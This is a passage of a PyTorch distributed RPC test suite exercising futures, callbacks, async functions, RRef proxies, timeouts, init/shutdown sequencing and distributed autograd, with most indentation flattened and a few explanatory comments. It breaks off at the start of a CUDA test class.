test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
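# NB: `_wait_all()` (exercised above and in the next few tests) is a private
# helper: futures created by rpc_async inside the `with` block are recorded in
# `_thread_local_var.future_list` and implicitly waited on when the block
# exits, which is why `fut.done()` already holds right after the block and the
# thread-local list is cleaned up afterwards.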
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash;
# instead we get an error indicating that the func does not exist there.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of the func on this node
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test
# could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
RuntimeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
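# NB: a small illustrative helper (not a test) for the `then()` semantics
# exercised above: each `then()` returns a *new* Future that completes with
# the callback's return value, so callbacks compose into a chain. Assumes RPC
# is already initialized; `dst` is a worker name as elsewhere in this file.
def _then_chaining_sketch(self, dst, depth=3):
    fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2, 2), 1))
    for _ in range(depth):
        # The callback receives the completed upstream future.
        fut = fut.then(lambda prev: prev.wait() + 1)
    # The result is the original reply plus one increment per chained callback.
    return fut.wait()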
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# There is no guarantee that the add_done_callback fn executes before the test finishes,
# so add a 'then' callback that runs afterwards and wait on it to ensure the first callback ran.
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
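# NB: a non-test sketch of the contrast exercised above: `then(cb)` returns a
# new Future carrying cb's return value, while `add_done_callback(cb)` returns
# None, so it is only useful for side effects and offers nothing to wait on.
def _callback_api_sketch(self, dst):
    fut = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
    chained = fut.then(lambda f: f.wait() * 2)  # a Future we can wait on
    fut.add_done_callback(lambda f: None)       # fire-and-forget side effect
    return chained.wait()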
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
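# NB: a compact reminder (not a test) of the three RRef proxy flavors used
# above, assuming `rref` owns an object exposing a method `m`:
#   rref.rpc_sync().m(...)   blocks and returns the value directly
#   rref.rpc_async().m(...)  returns a Future; call .wait() for the value
#   rref.remote().m(...)     returns an RRef; call .to_here() for the value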
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
if self.rank != 0:
og_func = rpc.api._broadcast_to_followers
og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
# Monkey-patch _broadcast_to_followers to fail, which would ensure
# _all_gather on leader raises an exception.
def raise_error(sequence_id, objects_map):
og_func(sequence_id, objects_map)
raise RuntimeError('simulation')
# Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
# which would ensure barrier is not called on followers.
def rref_error():
raise RuntimeError('simulation rref')
try:
rpc.api._broadcast_to_followers = raise_error
rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
rpc.shutdown()
finally:
rpc.api._broadcast_to_followers = og_func
rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
else:
with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
rpc.shutdown()
dist.barrier()
def _trainer_func(self, rref, sparse):
m = MyEmbeddingBagModel(sparse=sparse)
loss_fn = nn.MSELoss()
for i in range(10):
outputs = m(torch.rand(10, 10).long())
loss_fn(outputs, torch.rand(10, 10)).backward()
gradient = list(m.parameters())[0].grad
fut = rref.rpc_async().average(rref, i, gradient)
gradient = fut.wait()
if gradient.is_sparse:
gradient = gradient.to_dense().double()
ps_gradient = rref.rpc_sync().get_gradient(rref)
if ps_gradient.is_sparse:
ps_gradient = ps_gradient.to_dense().double()
self.assertTrue(torch.equal(gradient, ps_gradient))
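# NB: the trainer loop above follows the usual RPC parameter-server pattern:
# compute a local gradient, ship it to the server through the RRef proxy
# (`rref.rpc_async().average(...)`), then check that the gradient the server
# reports via `rref.rpc_sync().get_gradient(...)` matches what came back.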
@dist_init
def test_my_parameter_server(self):
self._my_parameter_server(False)
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
